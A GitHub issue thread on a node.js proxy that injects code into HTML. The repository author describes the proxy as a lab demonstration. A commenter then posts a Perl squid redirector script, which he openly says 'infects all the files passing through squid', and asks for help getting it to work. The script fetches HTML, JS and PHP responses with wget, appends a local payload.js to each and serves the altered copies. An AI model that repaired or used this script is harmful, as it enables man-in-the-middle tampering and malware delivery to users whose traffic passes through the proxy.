search

timopb / injectionproxy.js

A simple HTTP proxy written in node.js, capable of injecting code into html transmissions
MIT License
0 stars 0 forks source link

How stable is this? #1

Open hayzamjs opened 8 years ago

hayzamjs commented 8 years ago

Hey I wanted to use this for a project of mine which involves around a lot of connections in one day, can I use this or should I go with something like squid? Thanks for answering :)

EDIT : How many users can a worker handle?

timopb commented 8 years ago

It's a quick hack that has only been used in a lab environment and for presentations. The sole purpose of it is to demonstrate how easy packages can be injected into html with node.js and a few lines of code. It lacks a lot of features a sophisticated proxy soluton offers.

I don't recomend using it and suggest to go for squid or another more advanced solution for your purpose.

hayzamjs commented 8 years ago

Thanks for the reply, I wanted to try this with squid, I wrote a script which infects all the files passing through squid, but it doesn't work, can you please take a look ? Thanks!

#!/usr/bin/perl

$|=1;
$count = 0;
$pid = $$;

while(<>)
{
  chomp $_;
  if($_ =- /(.*\.html)/i)
  {
        $url = $1;
        system("/usr/bin/wget","-q","-O","/var/www/tmp/$pid-$count.html","$url");
        system("chmod o+r /var/www/tmp/$pid-$count.html");
        system("cat /etc/squid3/payload.js >> /var/www/tmp/$pid-$count.html");
        print "http://localhost/tmp/$pid-$count.html\n";
  }

    elsif($_ =- /(.*\.js)/i)
  {
        $url = $1;
        system("/usr/bin/wget","-q","-O","/var/www/tmp/$pid-$count.js","$url");
        system("chmod o+r /var/www/tmp/$pid-$count.js");
        system("cat /etc/squid3/payload.js >> /var/www/tmp/$pid-$count.js");
        print "http://localhost/tmp/$pid-$count.js\n";
  }

   elsif($_ =- /(*\/)/i)
  {
        $url = $1;
        system("/usr/bin/wget","-q","-O","/var/www/tmp/$pid-$count.php","$url");
        system("chmod o+r /var/www/tmp/$pid-$count.php");
        system("cat /etc/squid3/payload.js >> /var/www/tmp/$pid-$count.php");
        print "http://localhost/tmp/$pid-$count.php\n";
  }

    elsif ($_ =- /(.*\.php)/i)
  {
        $url = $1;
        system("/usr/bin/wget","-q","-O","/var/www/tmp/$pid-$count.php","$url");
        system("chmod o+r /var/www/tmp/$pid-$count.php");
        system("cat /etc/squid3/payload.js >> /var/www/tmp/$pid-$count.php");
        print "http://localhost/tmp/$pid-$count.php\n";
  }
else
  {
        print "$_\n";
  }
$count++;
}